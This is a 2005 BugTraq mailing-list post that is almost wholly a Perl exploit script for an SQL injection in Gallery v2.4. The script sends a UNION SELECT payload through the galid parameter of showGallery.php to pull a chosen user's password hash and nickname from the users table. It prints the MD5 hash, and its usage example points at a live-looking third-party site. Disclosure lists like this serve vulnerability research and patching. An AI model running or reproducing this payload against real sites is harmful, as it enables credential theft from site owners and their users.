BugTraq
Gallery_v2.4 SQL Injection Nov 04 2005 03:29PM
abducter_minds yahoo com
#!/bin/env perl
#------------------------------------------------------------#
#- Warning :- (ABDUCTER) Behind U BY (ABDUCTER_MINDS (at) S4A (dot) CC [email concealed]) OR (ABDUCTER_MINDS (at) YAHOO (dot) COM [email concealed])
#- [!] ==|| Gallery_v2.4 SQL Injection ||==
#- Gr33tz :-
#- N0N0 (MY LOVE)
#- WWW.S4A.CC
#- Devil-00
#- FOR ALL ARABIAN COUNTRIES
#------------------------------------------------------------#
use LWP::Simple;

print "\n\n==========================================\n";
print "\n= Exploit for Gallery_v2.4 ";
print "\n= BY |(ABDUCTER_MINDS[at]YAHOO.COM)| ";
print "\n= FOR ALL ARAB WWW.S4A.CC ";
print "\n============================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
print "\n==|| Warning ABDUCTER Behind U ||==";
print "\nUsage:\nperl $0 [host+script]\n\nExample:\nperl $0 http://tonioc.free.fr/gallery/ 1\n";
exit(0);
}
$url = "/showGallery.php?galid=-1%20UNION%20SELECT%20id,null,null,passw,null,ni
ck,null,null,null,null,nick,null%20FROM%20users%20WHERE%20id=$ARGV[1]/*"
;
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<SPAN class="strong"><b>(.*?)<\/b>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus